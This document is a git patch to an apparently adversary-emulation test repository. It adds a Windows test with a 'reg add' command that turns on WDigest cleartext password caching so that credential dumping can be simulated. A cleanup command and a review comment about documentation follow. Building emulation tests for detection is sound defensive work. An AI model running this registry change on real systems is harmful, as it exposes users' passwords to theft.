From 8b855a513909676e8deb314b7bf6e21d9bb8b7fa Mon Sep 17 00:00:00 2001
From: JB <35406993+cherokeejb@users.noreply.github.com>
Date: Tue, 17 Sep 2019 09:44:55 -0500
Subject: [PATCH] Added new atomic, 'Modify registry for password downgrade to plain text' (#566)
* Added new atomic, 'Modify registry for password downgrade to plain text'
* fixed syntax on executor
---
 atomics/T1112/T1112.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index a96b019f..30cb9093 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -87,3 +87,16 @@ atomic_tests:
 ### Garbage collection and closing of ntuser.dat ###
 [gc]::Collect()
 reg unload "HKU\$($ProfileList[$p].SID)"
+
+- name: Modify registry for password downgrade to plain text
+ description: |
+ Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
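Review bot: The `cleanup_command` at the end of the new test writes `UseLogonCredential` = 0 unconditionally instead of restoring the host's prior state, and the `description` neither says so nor warns that the host keeps WDigest cleartext credential caching enabled if cleanup is skipped or the run is interrupted. Forcing 0 looks like the safe choice, since it is the hardened setting, but it should be documented, for example by appending to the description: `Cleanup sets UseLogonCredential to 0 regardless of its previous value; run only on a test host and confirm the value after the run.` It would also help defenders if the description named the observable, e.g. `Detection: registry value set on HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential`. The enclosing `atomic_tests` list starts outside the hunk.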